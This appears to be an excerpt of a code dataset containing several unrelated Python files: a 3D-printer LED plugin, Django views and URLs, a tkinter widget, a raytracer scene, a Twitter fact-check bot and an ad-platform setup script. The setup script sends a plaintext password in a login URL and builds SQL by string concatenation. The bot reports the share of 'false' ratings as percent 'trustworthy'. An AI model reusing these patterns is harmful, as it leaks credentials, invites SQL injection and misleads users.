cmd):\n\t\t\t\tk = match.group(1).lower()\n\t\t\t\t# Marlin uses RUB instead of RGB\n\t\t\t\tif k == 'u': k = 'g'\n\t\t\t\ttry:\n\t\t\t\t\tv = float(match.group(2))\n\t\t\t\texcept ValueError:\n\t\t\t\t\t# more than likely match.group(2) was unspecified\n\t\t\t\t\tv = 255.0\n\t\t\t\tv = v/255.0 * 100.0 # convert RGB to RPi dutycycle\n\t\t\t\tv = max(min(v, 100.0), 0.0) # clamp the value\n\t\t\t\tdutycycles[k] = v\n\t\t\t\tself._logger.debug(u\"match 1: %s 2: %s\" % (k, v))\n\t\t\tfor l in dutycycles.keys():\n\t\t\t\tself._leds[l].ChangeDutyCycle(dutycycles[l])\n\t\t\t\t\n\t##~~ SettingsPlugin mixin\n\n\tdef get_settings_version(self):\n\t\treturn 1\n\n\tdef get_template_configs(self):\n\t\treturn [\n\t\t\tdict(type=\"settings\", name=\"LED Strip Control\", custom_bindings=False)\n\t\t]\n\n\tdef get_settings_defaults(self):\n\t\treturn dict(r=None, g=None, b=None)\n\n\tdef on_settings_initialized(self):\n\t\tself._logger.debug(u\"LEDStripControl on_settings_load()\")\n\t\tself._register_leds()\n\n\tdef on_settings_save(self, data):\n\t\tself._logger.debug(u\"LEDStripControl on_settings_save()\")\n\t\tself._unregister_leds()\n\t\toctoprint.plugin.SettingsPlugin.on_settings_save(self, data)\n\t\tself._register_leds()\n\n\n\t##~~ Softwareupdate hook\n\n\tdef get_update_information(self):\n\t\treturn dict(\n\t\t\tledstripcontrol=dict(\n\t\t\t\tdisplayName=\"LED Strip Control Plugin\",\n\t\t\t\tdisplayVersion=self._plugin_version,\n\n\t\t\t\t# version check: github repository\n\t\t\t\ttype=\"github_release\",\n\t\t\t\tuser=\"google\",\n\t\t\t\trepo=\"OctoPrint-LEDStripControl\",\n\t\t\t\tcurrent=self._plugin_version,\n\n\t\t\t\t# update method: pip\n\t\t\t\tpip=\"https://github.com/google/OctoPrint-LEDStripControl/archive/{target_version}.zip\"\n\t\t\t)\n\t\t)\n\n__plugin_name__ = \"LED Strip Control\"\n\ndef __plugin_load__():\n\tglobal __plugin_implementation__\n\t__plugin_implementation__ = LEDStripControlPlugin()\n\n\tglobal __plugin_hooks__\n\t__plugin_hooks__ = {\n\t\t\"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information,\n\t\t\"octoprint.comm.protocol.gcode.queuing\": __plugin_implementation__.HandleM150\n\t}\n\n","sub_path":"octoprint_LEDStripControl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"482080503","text":"from django.shortcuts import render\nfrom django.contrib import messages\nfrom django.conf import settings\n\nfrom mailchimp_marketing import Client\nfrom mailchimp_marketing.api_client import ApiClientError\n\napi_key = settings.MAILCHIMP_API_KEY\nserver = settings.MAILCHIMP_DATA_CENTER\nlist_id = settings.MAILCHIMP_EMAIL_LIST_ID\n\n# Create your views here.\ndef subscribe(email):\n\n mailchimp = Client()\n mailchimp.set_config({\n \"api_key\": api_key,\n \"server\": server,\n })\n\n member_info = {\n \"email_address\": email,\n \"status\": \"subscribed\",\n }\n\n try:\n response = mailchimp.lists.add_list_member(list_id, member_info)\n print(\"response: {}\".format(response))\n except ApiClientError as error:\n print(\"An exception occured: {}\".format(error.text))\n\n\ndef ComingSoon(request):\n\n if request.method == \"POST\":\n email = request.POST['email']\n print(email)\n subscribe(email)\n messages.success(request, \"Email received. Thank you!\")\n\n return render(request, 'index.html')\n","sub_path":"src/MeetNakama/ComingSoon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507292097","text":"import tkinter as tk\nfrom tkinter import ttk, font\n\nfrom src.connection.database import get_search_entities\n\n\nclass TitleWidget(ttk.Frame):\n def __init__(self, container, title_frame_number):\n super().__init__(container)\n\n self.font = font.Font(size=11)\n\n self.characters = ['None'] + get_search_entities('', 'Character')\n self.npcs = ['None'] + get_search_entities('', 'NPC')\n self.monsters = ['None'] + get_search_entities('', 'Monster')\n\n # --- Attributes ---\n self.title = 'Title ' + title_frame_number\n self.name = tk.StringVar()\n self.character = tk.StringVar(value=self.characters)\n self.npc = tk.StringVar(value=self.npcs)\n self.monster = tk.StringVar(value=self.monsters)\n\n # --- Widgets ---\n self.character_entry = tk.Listbox()\n self.npc_entry = tk.Listbox()\n self.monster_entry = tk.Listbox()\n self.requirements_entry = tk.Text()\n self.description_entry = tk.Text()\n\n # --- Frame ---\n item_widget_frame = ttk.Frame(self)\n item_widget_frame.grid(row=0, column=0, sticky=\"NSEW\")\n item_widget_frame.columnconfigure((0, 1), weight=1)\n\n self.create_widgets(item_widget_frame)\n\n for child in item_widget_frame.winfo_children():\n child.grid_configure(padx=5, pady=5)\n\n def create_widgets(self, container):\n # --- Title ---\n\n title_label = ttk.Label(\n container,\n text=self.title\n )\n title_label.grid(row=0, column=0, sticky=\"EW\")\n\n title_separator = ttk.Separator(\n container\n )\n title_separator.grid(row=1, column=0, columnspan=3, sticky=\"EW\")\n\n # --- Name ---\n\n name_label = ttk.Label(\n container,\n text=\"Name\"\n )\n name_label.grid(row=2, column=0, sticky=\"EW\")\n\n name_entry = ttk.Entry(\n container,\n textvariable=self.name,\n width=60\n )\n name_entry.grid(row=2, column=1, sticky=\"EW\")\n\n # --- User ---\n\n user_label = ttk.Label(\n container,\n text=\"User\"\n )\n user_label.grid(row=3, column=0, sticky=\"EW\")\n\n self.character_entry = tk.Listbox(\n container,\n listvariable=self.character,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.character_entry.grid(row=3, column=1, sticky=\"EW\")\n\n self.character_entry.select_set(0)\n\n character_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n character_scrollbar.config(command=self.character_entry.yview)\n character_scrollbar.grid(row=3, column=2, sticky=\"NS\")\n\n self.character_entry.config(yscrollcommand=character_scrollbar.set)\n\n # --- NPC ---\n\n self.npc_entry = tk.Listbox(\n container,\n listvariable=self.npc,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.npc_entry.grid(row=4, column=1, sticky=\"EW\")\n\n self.npc_entry.select_set(0)\n\n npc_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n npc_scrollbar.config(command=self.npc_entry.yview)\n npc_scrollbar.grid(row=4, column=2, sticky=\"NS\")\n\n self.npc_entry.config(yscrollcommand=npc_scrollbar.set)\n\n # --- Monster ---\n\n self.monster_entry = tk.Listbox(\n container,\n listvariable=self.monster,\n selectmode=\"extended\",\n exportselection=False,\n selectbackground=\"#2CCC5B\",\n highlightcolor=\"#1DE557\",\n font=self.font,\n width=1,\n height=4\n )\n self.monster_entry.grid(row=5, column=1, sticky=\"EW\")\n\n self.monster_entry.select_set(0)\n\n monster_scrollbar = ttk.Scrollbar(container, orient=\"vertical\")\n monster_scrollbar.config(command=self.monster_entry.yview)\n monster_scrollbar.grid(row=5, column=2, sticky=\"NS\")\n\n self.monster_entry.config(yscrollcommand=monster_scrollbar.set)\n\n # --- Requirements ---\n\n requirements_label = ttk.Label(\n container,\n text=\"Requirements\"\n )\n requirements_label.grid(row=6, column=0, sticky=\"EW\")\n\n self.requirements_entry = tk.Text(\n container,\n width=1,\n height=5\n )\n self.requirements_entry.grid(row=6, column=1, sticky=\"EW\")\n\n requirements_scroll = ttk.Scrollbar(\n container,\n orient=\"vertical\",\n command=self.requirements_entry.yview\n )\n requirements_scroll.grid(row=6, column=2, sticky=\"ns\")\n\n self.requirements_entry[\"yscrollcommand\"] = requirements_scroll.set\n\n self.requirements_entry.insert(tk.END, 'None')\n\n # --- Description ---\n\n description_label = ttk.Label(\n container,\n text=\"Description\"\n )\n description_label.grid(row=7, column=0, sticky=\"EW\")\n\n self.description_entry = tk.Text(\n container,\n width=1,\n height=5\n )\n self.description_entry.grid(row=7, column=1, sticky=\"EW\")\n\n description_scroll = ttk.Scrollbar(\n container,\n orient=\"vertical\",\n command=self.description_entry.yview\n )\n description_scroll.grid(row=7, column=2, sticky=\"ns\")\n\n self.description_entry[\"yscrollcommand\"] = description_scroll.set\n\n self.description_entry.insert(tk.END, 'None')\n","sub_path":"dist/rpg/src/title/title_widget.py","file_name":"title_widget.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"575449489","text":"from vector import Vector\nfrom sphere import Sphere\nfrom plane import Plane\nfrom light import Light\nfrom scene import Scene\n\nentities = []\n\n# plane\nplane = Plane(-2)\nplane.ambi_color = Vector(1.0, 1.0, 1.0)\nplane.ambi_coeff = 0.2\nplane.diff_color = Vector(1.0, 1.0, 1.0)\nplane.diff_coeff = 1.0\nentities.append(plane)\n\n# sphere 1\nsphere1 = Sphere(Vector(-4, 0, -7), 1)\nsphere1.ambi_color = Vector(1.0, 0.0, 0.0)\nsphere1.ambi_coeff = 0.2\nsphere1.diff_color = Vector(1.0, 0.0, 0.0)\nsphere1.diff_coeff = 1.0\nentities.append(sphere1)\n\n# sphere 2\nsphere2 = Sphere(Vector(0, 0, -7), 2)\nsphere2.ambi_color = Vector(0.0, 1.0, 0.0)\nsphere2.ambi_coeff = 0.2\nsphere2.diff_color = Vector(0.0, 1.0, 0.0)\nsphere2.diff_coeff = 0.5\nsphere2.spec_coeff = 0.5\nsphere2.spec_power = 32.0\nentities.append(sphere2)\n\n# sphere 3\nsphere3 = Sphere(Vector(4, 0, -7), 1)\nsphere3.ambi_color = Vector(0.0, 0.0, 1.0)\nsphere3.ambi_coeff = 0.2\nsphere3.diff_color = Vector(0.0, 0.0, 1.0)\nsphere3.diff_coeff = 1.0\nentities.append(sphere3)\n\nlights = []\n\n# light 1\nlight1 = Light(Vector(-4, 4, -3))\nlights.append(light1)\n\nscene = Scene(entities, lights)\n","sub_path":"raytracer/default_scene.py","file_name":"default_scene.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567006166","text":"import tweepy\nimport os\nimport time\nimport random\n\n\nimport json\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\napi_key = os.environ['GOOGLE_KEY']\nCONSUMER_KEY = os.environ['CONSUMER_KEY']\nCONSUMER_SECRET = os.environ['CONSUMER_SECRET']\nACCESS_TOKEN = os.environ['ACCESS_TOKEN']\nACCESS_SECRET = os.environ['ACCESS_SECRET']\n\nFILE = 'lastuser.txt'\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\ndef main(userQuery):\n factCheckService = build(\"factchecktools\", \"v1alpha1\", developerKey=api_key)\n request = factCheckService.claims().search(query=userQuery, reviewPublisherSiteFilter = None)\n response = request.execute()\n reply = getAllRatings(response)\n return reply\n\ndef getRating(claim):\n review = claim[\"claimReview\"][0]\n rating = \"\"\n\n if \"textualRating\" in review:\n rating = review[\"textualRating\"]\n return rating\n\ndef getAllRatings(res):\n i = 0\n if \"claims\" in res.keys() and len(res[\"claims\"]) > 0:\n for claim in res['claims']:\n rating = getRating(claim)\n if 'false' in rating.lower():\n i += 1\n return i/len(res['claims'])\n return 0\n\ndef get():\n f = open(FILE, 'r')\n id = f.read().strip()\n if id:\n id = int(id)\n f.close()\n return id\ndef store(num):\n f = open(FILE, 'w')\n f.write(str(num))\n f.close()\ndef reply():\n last = get()\n if last:\n mentions = api.mentions_timeline(last, tweet_mode='extended')\n else:\n mentions = api.mentions_timeline(tweet_mode='extended')\n for mention in reversed(mentions):\n rating = main(mention.full_text[11:])\n api.update_status('@' + mention.user.screen_name + \" \" + str(rating*100) + \"% trustworthy\", mention.id)\n last = mention.id\n store(last)\n\"\"\"\nwhile True:\n time.sleep(300)\n reply()\n\"\"\"\nreply()\n","sub_path":"vrar.py","file_name":"vrar.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"610431777","text":"\"\"\"qfgp01site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom extra_apps import xadmin\nfrom django.urls import path, include\nfrom users import views\nfrom . import views as curr_views\n\napp_name = \"cbv\"\nurlpatterns = [\n path('serverList/', curr_views.ServerListView.as_view(), name=\"serverList\"),\n # path('serverList/', curr_views.ServerDListView.as_view(), name=\"serverList\"),\n\n path('serverList//',\n curr_views.ServerDListView.as_view(), name=\"serverList\"),\n path('serverNowList/', curr_views.ServerNowListView.as_view(),\n name=\"serverNowList\"),\n\n path('serverDList/',\n curr_views.ServerDListView.as_view(), name=\"serverDList\"),\n\n path('serverDetail//', curr_views.ServerDetailView.as_view(),\n name=\"serverDetail\")\n]\n\n# handler404='qfgp01site.views.page_not_found'\n","sub_path":"Blog/qfgp01site/cbv/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200580199","text":"# -*- coding: utf-8 -*-\n\nfrom baseClass import TfParser\n\n\ndef tf_vec_normalization(vec, norm=\"l1_norm\"):\n if norm == \"l1_norm\":\n sumation = sum(vec)\n new_vec = [ele/sumation for ele in vec]\n else:\n print(\"Wrong Argument Provided !\")\n raise BaseException\n return new_vec\n\n\ndef cosine(vector_a, vector_b):\n def l2_norm(vector):\n norm_squared = 0\n for ele in vector:\n norm_squared += ele**2\n norm = norm_squared**0.5\n return norm\n\n l2_norm_a = l2_norm(vector_a)\n l2_norm_b = l2_norm(vector_b)\n dot_product = sum([vector_a[i]*vector_b[i] for i in range(len(vector_a))])\n cosine = dot_product/(l2_norm_a*l2_norm_b)\n return cosine\n\n\ndef tf_vector(content):\n parser = TfParser(content)\n return parser()[0], parser()[1]\n\n\ndef cal_similarity(file_a, file_b):\n vector_space_a, tf_a = tf_vector(file_a)\n vector_space_b, tf_b = tf_vector(file_b)\n vector_space = vector_space_a | vector_space_b\n vector_ele_pos_mapping = list(vector_space)\n vector_a = [0 for ele in range(len(vector_ele_pos_mapping))]\n vector_b = list(vector_a)\n for key in tf_a.keys():\n position = vector_ele_pos_mapping.index(key)\n vector_a[position] = tf_a[key]\n for key in tf_b.keys():\n position = vector_ele_pos_mapping.index(key)\n vector_b[position] = tf_b[key]\n cos = cosine(vector_a, vector_b)\n return cos\n\nif __name__ == \"__main__\":\n file_path = [r\"test_cosine/0\", r\"test_cosine/1\"]\n cal_similarity(file_path[0], file_path[1])\n","sub_path":"waffle/ml/mil/vector_util.py","file_name":"vector_util.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"181364331","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2018/2/24 15:03\r\n# @Author : wanglanqing\r\n\r\nimport requests\r\nimport sys\r\nimport time, datetime\r\nfrom utils.db_info import *\r\n\r\n\r\nclass TemplateActCreation(object):\r\n def __init__(self, templateTypeName, act_name, award_num, adzoneId):\r\n '''\r\n :param templateTypeName:模板类型名称\r\n :param act_name: 活动名称\r\n :param award_num: 奖品数量,该参数由前台页面提供,分别为6和8\r\n :return:\r\n '''\r\n self.s = requests.session()\r\n self.s.get('http://api.admin.adhudong.com/login/login_in.htm?name=test&pwd=!Qq123456')\r\n self.templateTypeName = templateTypeName\r\n self.act_name = act_name\r\n self.award_num = award_num\r\n self.db = DbOperations()\r\n # self.adzone = 467\r\n self.appkey=\"https://display.adhudong.com/site_login_ijf.htm?app_key=\"\r\n self.adzoneId = adzoneId\r\n self.begin_time = str(datetime.date.today().strftime('%Y-%m-%d')) + ' 00:00:00'\r\n self.end_time = str((datetime.date.today() + datetime.timedelta(days=120)).strftime('%Y-%m-%d')) + ' 00:00:00'\r\n\r\n\r\n def get_actId(self):\r\n '''\r\n :return:返回act_id\r\n '''\r\n sql_act = \"select id from voyager.base_act_info where act_name='\" + self.act_name + \"'\"\r\n print(sql_act)\r\n re_act = self.db.execute_sql(sql_act)\r\n if len(re_act)!= 1:\r\n print('get_actId,有问题')\r\n else:\r\n act_id = int(re_act[0][0])\r\n return act_id\r\n def get_awards_count(self):\r\n sql_ac= \" select count(*) from voyager.act_award where act_id=\" + str(self.get_actId())\r\n re_ac = self.db.execute_sql(sql_ac)\r\n return int(re_ac[0][0])\r\n\r\n def get_templateTypeId(self):\r\n '''\r\n 通过全局参数templateTypeName,获得templateTypeId\r\n :return:返回templateTypeId\r\n '''\r\n sql_ttpye = \"select id from voyager.template_type where name='\" + self.templateTypeName + \"'\"\r\n print(sql_ttpye)\r\n re_ttpye = self.db.execute_sql(sql_ttpye)\r\n if len(re_ttpye) != 1:\r\n print('get_templateTypeId , 名称有问题')\r\n else:\r\n templateTypeId = int(re_ttpye[0][0])\r\n return templateTypeId\r\n\r\n def get_templateId(self):\r\n '''\r\n :return:返回templateId\r\n '''\r\n templateTypeId=str(self.get_templateTypeId())\r\n sql_ttid = \"select id from voyager.base_template_info where template_type_id=\" + templateTypeId\r\n print(sql_ttid)\r\n re_ttid = self.db.execute_sql(sql_ttid)\r\n print('&&&***^')\r\n print(re_ttid)\r\n if len(re_ttid) != 1:\r\n print('get_templateId, 有问题')\r\n else:\r\n templateId = int(re_ttid[0][0])\r\n return templateId\r\n\r\n def create_template_type(self, locationAdress, preview=\"https://img0.adhudong.com/template/201802/24/999337a35a1a9169450685cc66560a05.png\",classifi=1):\r\n '''\r\n name:模板类型名称\r\n classifi: 模板分类,抽奖(1)、签到(2)、聚合页(3),\r\n prizesNum: 要求奖品数量,\r\n locationAdress: 代码地址,\r\n preview: 模板预览图\r\n '''\r\n json_body = {\r\n 'name': self.templateTypeName,\r\n 'classifi': classifi,\r\n 'prizesNum': self.award_num,\r\n 'locationAdress': locationAdress,\r\n 'preview': preview\r\n }\r\n post_url = \"http://api.admin.adhudong.com/template/typeInsert.htm\"\r\n re = self.s.post(post_url, data=json_body)\r\n print(sys.argv[0], re)\r\n return re\r\n # print(re.json()['code'])\r\n # if re.json()['code'] == 200:\r\n # return ('200')\r\n # else:\r\n # # try:\r\n # # return myException('create_template_type, 失败了')\r\n # return ('300')\r\n # # except Exception as e:\r\n # # return e\r\n\r\n\r\n def create_template(self,templateName, templateStyleUrl, template_conf_items=None):\r\n '''\r\n :param templateName,模板名称\r\n :param templateStyleUrl, 模板样式地址,css\r\n :param positionId ,坑位\r\n :template_conf_items, 默认为空,接收前台传入的参数\r\n '''\r\n templateTypeId=self.get_templateTypeId()\r\n post_url =\"http://api.admin.adhudong.com/template/modefy.htm\"\r\n json_body = {\r\n \"positionId\": '1',\r\n \"templateTypeId\": templateTypeId,\r\n \"templateName\": templateName,\r\n \"templateStyleUrl\" : templateStyleUrl,\r\n \"templateStyleImage\" : \"https://img3.adhudong.com/template/201802/25/2c6f4700db7982447348db4d0960e3ad.png\",\r\n \"remark\":template_conf_items,\r\n \"supportPop\":1,\r\n \"supportVideo\":1,\r\n \"positionJson\":'[{\"position_name\":\"活动抽奖弹窗\",\"pic_vedio\":\"1,2\",\"id\":1,\"selected\":true,\"key\":1},{\"position_name\":\"天降广告弹窗\",\"pic_vedio\":\"1\",\"id\":2,\"selected\":true,\"key\":2},{\"position_name\":\"强推\",\"pic_vedio\":\"1\",\"id\":4,\"selected\":true,\"key\":4},{\"position_name\":\"内部推广抽奖活动零钱位置\",\"pic_vedio\":\"1\",\"id\":6,\"selected\":true,\"key\":6},{\"position_name\":\"视频1_我的奖品\",\"pic_vedio\":\"2,3\",\"id\":27,\"selected\":true,\"key\":27}]'\r\n }\r\n re = self.s.post(post_url, data=json_body)\r\n\r\n print(sys.argv[0], re)\r\n return re\r\n # if re.json()['code'] == 200:\r\n # return ('create_template, 成功了')\r\n # else:\r\n # try:\r\n # # raise myException('create_template, 失败了')\r\n # raise SystemExit\r\n # except Exception as e:\r\n # return e.message\r\n\r\n def create_act(self, free_num):\r\n '''\r\n\r\n '''\r\n #创建活动sql, act_name,award_num,free_num,template_id\r\n template_id=self.get_templateId()\r\n print('=================================' + str(template_id))\r\n time.sleep(10)\r\n post_url = \"http://api.admin.adhudong.com/act/modefy.htm\"\r\n json_body = {\r\n \"status\": 1,\r\n \"awardNum\": 3,\r\n \"expand1\": 2,\r\n \"expand2\":2,\r\n \"expand8\":'2019-08-09 00:00:00',\r\n \"changeTimes\": 2,\r\n \"bannerImageUrl\": \"https://img3.adhudong.com/award/201802/25/9867c921ca0178820b8a37c677876223.jpg\",\r\n \"actRuleInfo\": \"

参与活动即有机会获得大奖。活动为概率中奖,奖品数量有限,祝君好运。

惊喜一:1000元现金

惊喜二:500元现金

惊喜三:200元现金

惊喜四:100元现金

惊喜五:50元现金

惊喜六:幸运奖

重要声明:

1、实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待

2、卡券类奖品使用规则详见卡券介绍页

3、通过非法途径获得奖品的,主办方有权不提供奖品

\",\r\n \"isPopupAd\":\"1\",\r\n \"popupTemplateId\":\"17\",\r\n \"isRelevance\":\"1\",\r\n \"customAct\":\"0\",\r\n \"actStyleId\":\"109\"\r\n }\r\n json_body['actName'] = self.act_name\r\n json_body['templateId'] = template_id\r\n json_body['freeNum'] = free_num\r\n re = self.s.post(post_url, data =json_body)\r\n return re\r\n # act_sql=\"\"\"\r\n # INSERT INTO voyager.base_act_info (act_type,act_name,banner_image_url,cover_image_url,award_num,free_num,begin_time,end_time,act_rule_info,`STATUS`,update_time,create_time,template_id,expand1,expand2,expand3,expand4,expand5,expand6,expand7,expand8,expand9,change_times\r\n # )VALUES(1,{0},'https://img4.adhudong.com/award/201802/22/089c376e9519c85ab8ce5fced7c9ea49.jpg',\r\n # NULL,{1},{2},NULL,NULL,\r\n # '

参与活动即有机会获得大奖。活动为概率中奖,奖品数量有限,祝君好运。

惊喜一:1000元现金

惊喜二:500元现金

惊喜三:200元现金

惊喜四:100元现金

惊喜五:50元现金

惊喜六:幸运奖

重要声明:

1、实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待

2、卡券类奖品使用规则详见卡券介绍页

3、通过非法途径获得奖品的,主办方有权不提供奖品1

',\r\n # 1,now(),now(),{3},1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL\r\n # );\"\"\".format(\"'\"+self.act_name+\"'\", self.award_num, free_num, templateId)\r\n # print(act_sql)\r\n # try:\r\n # self.db.execute_sql(act_sql)\r\n # self.db.mycommit()\r\n # if self.get_actId():\r\n # return ('create_act,成功了')\r\n # else:\r\n # try:\r\n # raise myException('create_act, 失败了')\r\n # except Exception as e:\r\n # return e.message\r\n # except:\r\n # self.db.myrollback()\r\n\r\n\r\n def create_awards(self):\r\n act_id = str(self.get_actId())\r\n # act_id = str(self.get_actId('淘粉吧转盘0228'))\r\n #创建奖品的sql\r\n award_ths = ''',0,15,1,now(),now(),'谢谢参与','https://img0.adhudong.com/association/201802/22/10bf5888ea77ea198db1dbadc663b05f.jpg',\r\n 6,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安��发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_onemore= ''',0,15,2,now(),now(),'再抽一次奖品','https://img4.adhudong.com/association/201802/22/49b99fca05649598059cc2dc733509f4.jpg',\r\n 5,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky1= ''',0,70,3,now(),now(),'百元现金红包','https://img3.adhudong.com/association/201802/22/2c6f4700db7982447348db4d0960e3ad.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky2= ''',0,0,4,now(),now(),'20G流量','https://img2.adhudong.com/association/201802/22/d1c54c0eb8259f992f500015f67f8907.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky3 = ''',0,0,5,now(),now(),'第3个大奖品','https://img0.adhudong.com/association/201802/22/a4a40a28a4b21c1b50011102f07801a0.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky4 = ''',0,0,6,now(),now(),'第4个奖品','https://img0.adhudong.com/association/201802/22/a4a40a28a4b21c1b50011102f07801a0.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky5 = ''',0,0,7,now(),now(),'第5个奖品','https://img3.adhudong.com/association/201801/09/7f7b527213eccb7e2279b428379bf193.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n award_lucky6 = ''',0,0,8,now(),now(),'第6个奖品','https://img2.adhudong.com/association/201801/09/8f3e1ae44f5f69d1f7d9730243f5a2ec.png',\r\n 7,NULL,NULL,NULL,'

商品详情的信息

','

 1.实物类奖品将在活动结束后5-10个工作日内安排发货,请耐心等待;

2.卡券类奖品使用规则详见卡券介绍页 

')'''\r\n\r\n award_6_list = [award_ths, award_onemore, award_lucky1, award_lucky2, award_lucky3, award_lucky4]\r\n award_8_list = [award_ths, award_onemore, award_lucky1, award_lucky2, award_lucky3, award_lucky4, award_lucky5, award_lucky6]\r\n if int(self.award_num) == 6:\r\n award_list = award_6_list\r\n else:\r\n award_list = award_8_list\r\n for award in award_list:\r\n award_sql = '''INSERT INTO act_award (act_id,award_id,award_rate,\r\n priority,update_time,create_time,show_copy,award_icon,act_award_type,begin_time,end_time,award_num,\r\n award_details,award_get_instructions)\r\n VALUES (''' + act_id + award\r\n print(award_sql)\r\n try:\r\n self.db.execute_sql(award_sql)\r\n self.db.mycommit()\r\n except:\r\n self.db.myrollback()\r\n if self.get_awards_count() == self.award_num:\r\n return '奖品添加成功,奖品个数为' + str(self.award_num)\r\n else:\r\n return '奖品添加失败'\r\n\r\n def __del__(self):\r\n self.db.close_cursor()\r\n self.db.close_db()\r\n\r\n\r\n def create_volidate_info(self):\r\n sql = \"select id from voyager.advertiser where type=2 and state in (2,3,5) limit 15\"\r\n adv_ids = self.db.execute_sql(sql)\r\n adv_id = ''\r\n post_url = \"http://api.admin.adhudong.com/adver/violationInsert.htm\"\r\n\r\n adv_count = len(adv_ids)\r\n for i in range(adv_count):\r\n adv_id = str(adv_ids[i][0])\r\n remark = '测试违规记录分页数据'+str(i)\r\n params = {'violationType': '1',\r\n 'violationRemark': remark,\r\n 'violationLink': 'http://music.baidu.com/songlist/tag/%E7%BA%AF%E9%9F%B3%E4%B9%90?orderType=1',\r\n 'advertiserId': adv_id\r\n }\r\n print(params)\r\n # re = self.s.post(post_url, data=params)\r\n # print(re.url)\r\n\r\n def get_list(self):\r\n url = \"http://api.admin.adhudong.com/advertiser/creativelist.htm?page=1&page_size=200\"\r\n re = self.s.get(url).json()['data']['data']\r\n re_len = len(re)\r\n # print(re)\r\n for i in range(re_len):\r\n print(re[i]['id'],re[i]['state'], re[i]['lastSubReviewTime'], re[i]['createTime'])\r\n # print(re[i]['state'])\r\n\r\n def adzone_act(self):\r\n dsql=r\"delete from voyager.adzone_act where adzone_id in ({});\".format(self.adzoneId)\r\n self.db.execute_sql(dsql)\r\n isql=r'''INSERT INTO voyager.adzone_act (adzone_id,act_id,act_time,priority,act_begin_time,act_end_time ) VALUES\r\n ( '{}','{}','1', '1','{}','{}' );'''.format(self.adzoneId, self.get_actId(), self.begin_time, self.end_time)\r\n self.db.execute_sql(isql)\r\n keysql = '''select app_key from voyager.base_adzone_info where id in ({})'''.format(self.adzoneId)\r\n key_re = self.db.execute_sql(keysql)\r\n return self.appkey + str(key_re[0][0])\r\n\r\nif __name__=='__main__':\r\n #为模板类型名称\r\n #__init__(self, templateTypeName, act_name, award_num):\r\n ct = TemplateActCreation('九宫格ce2',8,15,1810)\r\n #创建模板类型,create_template_type(self, classifi, locationAdress, preview=\"https://img0.adhudong.com/template/201802/24/999337a35a1a9169450685cc66560a05.png\",prizesNum=6)\r\n # ct.create_template_type('https://display.adhudong.com/new/nineBlockBox.html')\r\n\r\n ct.create_template('testTemp','https://display.adhudong.com/new/nineBlockBox.html')\r\n # ct.get_list()\r\n #创建模板 ct.create_template(templateName, templateStyleUrl)\r\n # 